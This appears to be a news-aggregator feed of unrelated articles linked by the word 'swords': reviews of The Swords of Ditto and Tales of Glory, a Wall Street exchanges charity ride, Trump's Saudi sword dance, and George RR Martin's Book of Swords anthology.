Save The World And Hug Your Friends In The Swords Of Ditto https://briefnews.eu/save-the-world-and-hug-your-friends-in-the-swords-of-ditto/ https://briefnews.eu/save-the-world-and-hug-your-friends-in-the-swords-of-ditto/#respond Wed, 25 Apr 2018 20:44:01 +0000 http://briefnews.eu/save-the-world-and-hug-your-friends-in-the-swords-of-ditto/ ditto2.jpg
So here’s a little thing about The Swords of Ditto that completely sold me on this game: when you’re playing co-op and one of your intrepid adventurers falls in combat, the other player can run up to them and literally hug them back to life. Isn’t that just the sweetest thing?

This roguelite, cleverly disguised as a top-down Zelda-like, has you trying to rid the land of the evil sorceress Mormo. You are the chosen one, the wielder of the magical sword of Ditto, so it falls on you to end the curse and vanquish evil… except that, should you fail on your quest, another hero will rise one hundred years later and try again.

In order to stand a chance, you have to visit particular dungeons which help you by supplying you with new items (or “toys”, to be precise) or which weaken Mormo’s influence and make the final battle a little easier. However, if you just beeline to your next objective, you’re seriously missing out.

Exploring the game’s overworld is a delight, with lots of secrets to uncover and a colorful cast of characters to meet. Some of these have additional quests for you – but there’s precious little handholding involved. You can spend a lot of time exploring and gearing up for the final battle. But alas, time is in short supply.

With only four in-game days before the final battle, there is simply no way to do everything at once. Repeated playthroughs are a necessity, and some of your stuff will carry over to the next hero. Figuring out how things work, what to do, and which order to do it in is a huge part of this game.

While the lack of handholding will leave you somewhat clueless in the first few attempts, things pick up from there. The layout of the overworld changes with each playthrough, and – depending on how you did on your previous attempt – the world itself changes with it.

As you constantly fail to defeat Mormo, evil thrives and the land suffers. Things start to look more drab, people seem a little more on edge, and there are more monsters out and about. Conversely, each victory makes the world a brighter, better place.

While the roguelite aspects of The Swords of Ditto are enough to draw you in, what really makes the game shine is its style and charm. This is such an odd and lovely place, with goofy NPCs and bosses, toys, stickers, and sweets – the whole game is childlike in a good way. Simply exploring this world is a lot of fun and will put a smile on your face. And have I mentioned the kazoo? There’s a kazoo-based quick travel system. I mean, come on, that’s wonderfully silly.

You can attempt to overthrow Mormo on your own, but co-op play is also an option, and it is literally as easy as picking up a controller and just starting to play, with the option of dropping out at any time. Sure, the world needs saving, but sometimes you just want to explore said world with your kids and have a little fun… or maybe you really need help? The game lets you do all that quite effortlessly.

The Swords of Ditto can feel a little harsh and directionless, particularly in the beginning, but it’s worth sticking with it. Once you get the hang of the game, its cheery world will leave you grinning like a fool and remind you that yes, videogames are good.

You can purchase The Swords of Ditto from GOG or Steam for $ 19.99. The game is also available for the PS4 with some platform-specific extras. For more information, visit the game’s website and follow developer onebitbeyond on Twitter.

Tales of Glory hands-on: Swingin’ and slayin’ with swords and spears in VR https://briefnews.eu/tales-of-glory-hands-on-swingin-and-slayin-with-swords-and-spears-in-vr/ https://briefnews.eu/tales-of-glory-hands-on-swingin-and-slayin-with-swords-and-spears-in-vr/#respond Sun, 10 Dec 2017 15:00:39 +0000 http://briefnews.eu/tales-of-glory-hands-on-swingin-and-slayin-with-swords-and-spears-in-vr/

Two of my favorite PC games are Chivalry: Medieval Warfare and Mount & Blade (both Warband and the original), so consider me excited when I saw Tales of Glory for the first time. With a heavy focus on first-person melee combat among an assortment of knights wielding weapons like pikes and swords and spears, it looks like the recipe for one of VR’s most exhilarating titles yet.

We’ve seen a ton of VR games that focus on small-scale combat, such as 1-on-1 dueling or exploring a dungeon to fight a few enemies here and there, but there aren’t a whole lot of VR games that put you on the battlefield in a larger way. Naturally, that’s exactly what Tales of Glory aims to do.

Just like with Chivalry and Mount & Blade, you take on the role of a soldier in a big medieval battle. In Chivalry it’s all about the action with a smattering of game modes ranging from team-based objective warfare to straight up deathmatch. Mount & Blade, for those unaware, is a much more tactical affair as you roam the land amassing an army, challenging kings to battle, and sieging castles as you spread your banner throughout the kingdom. It’s also got one of the most dedicated and creative modding communities in all of PC gaming.

While Tales of Glory surely lacks the scope and polish of either of those titles, it more than makes up for it in its originality and execution. The fact of the matter is that there just isn’t anything else like Tales of Glory for VR headsets right now.

With 20 different battlefields, more than 20 different weapons to pick from including longbows, swords, polearms, maces, flails, and more, plus horseback combat and castle sieges, it’s a bit like a heavy dose of fantasy-themed wish fulfillment for me.

Battles can feature up to 100 NPCs total, which really lends a fascinating sense of scale. I’m used to VR games that tip-toe around action and don’t let you interact with more than a handful of characters at any time, but the first time you see a catapult crash into the side of a castle and send enemies ragdollign through the air — while in VR — is pretty special.

Right now it’s all just sandbox-style skirmish matches, but the mechanics are pretty solid. The weapons all feel different and when you start a game you get to pick from an assortment of them. Horseback riding feels a bit janky, but it was still fun to ride down enemies on an open field. Mastering the bow is really enjoyable, just as it is in other games like The Lab’s Longbow and even Skyrim VR.

All-in-all Tales of Glory in its current state is very much like a robust tech demo with a lack of structured content as the skeletal makeup of a much larger game. I really want to play that other, finished game, but this isn’t a bad start.

Since Tales of Glory is still in Early Access it has its fair share of bugs and optimization issues. In fact, unless you have a very high-end rig then you’re probably gonna hit stuttering and maybe even crashes. There’s still a lot of work to be done on this title, including a proper “campaign” mode for single-player and multiplayer features.

The most brutal rivals on Wall Street are putting their swords down for a good cause https://briefnews.eu/the-most-brutal-rivals-on-wall-street-are-putting-their-swords-down-for-a-good-cause/ https://briefnews.eu/the-most-brutal-rivals-on-wall-street-are-putting-their-swords-down-for-a-good-cause/#respond Sat, 07 Oct 2017 05:11:50 +0000 http://briefnews.eu/the-most-brutal-rivals-on-wall-street-are-putting-their-swords-down-for-a-good-cause/ unnamed 35CBOE

The rivalries between the biggest US stock exchanges make the Coke-Pepsi divide look trivial.

On social media and in public filings with regulators, these companies brutally attack their rivals and their business models. This reporter has witnessed first hand the degree to which folks at the four main US exchanges will go to throw serious shade at one another.

But this weekend Nasdaq, the NYSE, IEX, CBOE and its subsidiary Bats will put aside their differences for a good cause: autism research. On Saturday, the exchanges are sending teams to participate in the third annual Wall Street Rides FAR, a biking charity race that raises money for the Autism Science Foundation.

Autism affects 1 in every 68 children, according to the Center for Disease Control and Prevention.

“We go after each other because market structure matters and we all want the best model to win, but some causes are big enough for us to put aside our differences,” said Bryan Harkins, head of US equities and global FX at CBOE, the Chicago-based exchange group. He started the charity event with his wife three years ago.

The ride, which takes place in Westchester County, NY offers “a choice of three distances and challenge levels, from a 4-mile family ride to a 62-mile, hilly metric century, you’ll be supported…by our volunteer crew.”

And the exchanges are all very excited about it. In the spirit of their coming together, we’ll give them all a say here:

“It’s great to participate in an event that brings together the trading community in support of such a worthy cause,” said Ivan Brown, head of options at the NYSE.

Here’s Nasdaq’s Tal Cohen, SVP and head of Nasdaq’s equities markets:

“We have seven staffers participating and it’s important we stay involved with FAR in the future, to help build on the great work Bryan started and continues to manage.”

“In this industry, we compete intensely every day, but it’s great to see everyone putting those competitive differences aside for such a great cause,” said Rob Salman of IEX’s business development team.

Not always so nice

That’s all a much different tone than what underpins their usual conversations about each other.

Recently Nasdaq and NYSE got into a spat over how much business they were winning from each other for the world to see on Twitter. Take a look:

Nasdaq was responding to this tweet by NYSE:

Here’s IEX president Brad Katsuyama criticizing a new market for small-cap companies by the New York Stock Exchange:

“NYSE American is nothing like IEX — paying an unprecedented rebate doubles down on their hypocrisy, and is a desperate distraction to protect how they really make money: selling speed advantages on their two main exchanges.”

CBOE President and COO Chris Concannon responded harshly to Katsuyama’s desire to ban rebates, which basically are incentives for market makers and brokers, saying “this notion of banning rebates — it lacks understanding of how our market works.“

The niceties will be fun while they last.

‘Swords of Ditto’ scratches that retro ‘Zelda’ itch https://briefnews.eu/swords-of-ditto-scratches-that-retro-zelda-itch/ https://briefnews.eu/swords-of-ditto-scratches-that-retro-zelda-itch/#respond Wed, 23 Aug 2017 17:41:50 +0000 http://briefnews.eu/swords-of-ditto-scratches-that-retro-zelda-itch/

Washed up on the beach, you, young boy/girl/robot, are the hero that will save the island of Ditto. Or you’ll fail, and plunge the land into a hundred years of darkness until another hero is born. OneBitBeyond’s The Swords Of Ditto puts you control one tiny adventurer at a time, and if when you die, when the Big Evil (some sorceress of some kind) fries you on the spot, you won’t live to fight another day. However, someone else will claim your hero’s sword and continue the struggle. That’s the crux, but it’s how OneBitBeyond have executed it, in a top-down action RPG that leans heavily on SNES-era Zelda (and some Secret Of Mana), with a punchy cartoon style that belies the small team behind it all.

If you have watched the announce trailer (you should), you can tell that there’s an awful lot of love baked into the game, which lands on PS4 and PC next year. Even the randomly-generated hero (it can be a robot, yes!) somehow endears themselves to me over a mere 30-minute hands-on play.

I’m playing alongside OneBitBeyond’s Jonathan Biddle, who explains his through a sample of secondary weapons you earn to complement your sword. There’s lighting paper to set foes and grass on fire, a bow and arrow (of course), as well as more esoteric weapons like a nerf gun (which does no damage but can trigger switches), a golf club, a huge horse chestnut mace and many more. These work not only as weapons, but help you progress through dungeons, and weaken the big end boss. (You could attack her right at the start of the game, but I was warned that would not end well…)

Yep, two adventurers can play alongside each other, which makes some enemies easier to take down, but sometimes makes some puzzles harder — timed platform jumping is not a fun team activity.

Besides your home town, the world you explore is regenerated each time your hero dies: dungeons also are redrawn, enemy placement redistributed, and puzzles swapped around. Not that you’ll have to struggle across the map to hop from distant dungeons to home: just summon a trans-dimensional bus with a kazoo. Don’t worry, the whimsy isn’t ever cloying, and some of the characters already teased, like a feline fight arena teacher or a sweaty octopus stewing in a hotspring bath will likely pull you further into the game. Never underestimate the power of silly ideas and cute design.

The game is a lot of fun, especially combining multiple weapons and gadgets for extra destruction. And while the game is headed for PC and PS4 next spring, given the cooperative play option and how much inspiration it takes from the guy in green with the pointy ears, is it too much to ask for a Switch port?

Two videos posted on Twitter show President Trump, secretary of state Rex Tillerson, and secretary of commerce Wilbur Ross dancing while holding swords during their visit to Saudi Arabia.

Reince Priebus and Stephen Bannon also make a brief appearance in the clip.

Trump’s visit to Saudi Arabia kicked off his first foreign trip as president. After Saudi Arabia, Trump will visit Israel, the Vatican, Sicily, and Belgium in an initiative to visit the sites of the world’s three major religions: Islam, Judaism, and Christianity.

After meeting with Saudi Arabia’s crown prince, Trump hailed the interaction as “tremendous” and said an arms deal signed between the two countries would lead to “jobs, jobs, jobs.”

‘Game Of Thrones’ Author George RR Martin To Release New Writing In 2017 ‘Book Of Swords’ https://briefnews.eu/game-of-thrones-author-george-rr-martin-to-release-new-writing-in-2017-book-of-swords/ https://briefnews.eu/game-of-thrones-author-george-rr-martin-to-release-new-writing-in-2017-book-of-swords/#respond Fri, 27 Jan 2017 23:19:29 +0000 http://briefnews.eu/game-of-thrones-author-george-rr-martin-to-release-new-writing-in-2017-book-of-swords/

Game of Thrones author George RR Martin will indeed release new material set in the world of his popular A Song of Ice and Fire series in 2017, but it isn’t exactly what fans of Game of Thrones were hoping for. Still, the new announcement may serve to whet the appetites of readers who have been looking for new George RR Martin material for years.

George RR Martin, known affectionately around the web on fan sites as GRRM, has been working on the sixth book in the A Song of Ice and Fire series since the release of the fifth book, A Dance With Dragons, in 2011. The new book, entitled Winds of Winter, is long awaited by fans, although GRRM has teased a possible 2017 release. However, Martin has made similar statements before, and even his recent Winds of Winter tease on his blog (called NotABlog) was not particularly enlightening.

“Not done yet, but I’ve made progress. But not as much as I hoped a year ago when I thought to be done by now. I think it will be out this year. (But hey, I thought the same thing last year.)”

Martin is notorious for not meeting deadlines, much of which is attributed by readers to his writing process. Referring to himself as a “gardener” style author, Martin eschews writing outlines in favor of letting the storyline unfold naturally as he writes, branching off in different directions as he writes towards his ultimate narrative goals. This process often apparently leads him into tangents, and he often discards large passages and rewrites others. Early last year, GRRM discussed his problems in finishing Winds of Winter before 2016.

“Sometimes the writing goes well and sometimes it doesn’t, and that was true for me even when I was in my 20s. And as spring turned to summer, I was having more bad days than good ones. Around about August, I had to face facts: I was not going to be done by Halloween.”

Longtime readers were disappointed as the immensely popular HBO television adaptation series Game of Thrones overtook the narrative of the book series in 2016 during the show’s sixth season. Hopefully, the new short story will give the many readers patiently waiting for A Song of Ice and Fire something to talk about-about until Winds of Winter is finally released.

GRRM Contribution To ‘Book Of Swords’

The new George RR Martin short story will be released in an anthology called Book Of Swords, edited by Gardner Dozois. A longtime friend and collaborator of GRRM, Dozois has been working on the anthology since 2015, and it is scheduled for release in October of 2017. Early press related to Book of Swords came from the website of one of the contributors, Matthew Huges, author of the Archonate series. Hughes posted on his website on November 24, 2015, that he had been contacted about contributing to Book of Swords.

“Gardner Dozois invited me to send him a story for an upcoming theme anthology to be called The Book of Swords. Assuming Gardner likes what I’ll send him, I’ll be joining K.J. Parker, Scott Lynch, Robin Hobb, Garth Nix, C.J. Cherryh, Elizabeth Bear, Ellen Kushner, Ken Liu, Danial Abraham, Cecelia Holland, and Peter S. Beagle in the table of contents. And probably more big names who have yet to commit.”

Given George RR Martin’s relationship and history of working with Gardner Dozois, many fans of Game of Thrones and A Song of Ice and Fire immediately began speculating that Martin would be among the contributors. Now, Martin’s involvement has been confirmed on the Book of Swords Amazon page.

“Fifteen original tales celebrating fantasy’s golden age of sword and sorcery, including a new story from George R. R. Martin set in the world of A Game of Thrones!”

Although there are few further details other then the new short story will indeed be set in the universe of A Song of Ice and Fire, many fans are already speculating online, as can be seen in this Reddit post on the “r/asoiaf” subreddit. Certainly, the news about George RR Martin’s new release is giving fans something to talk about during the long wait for Winds of Winter. Let us know what you think in the comments.
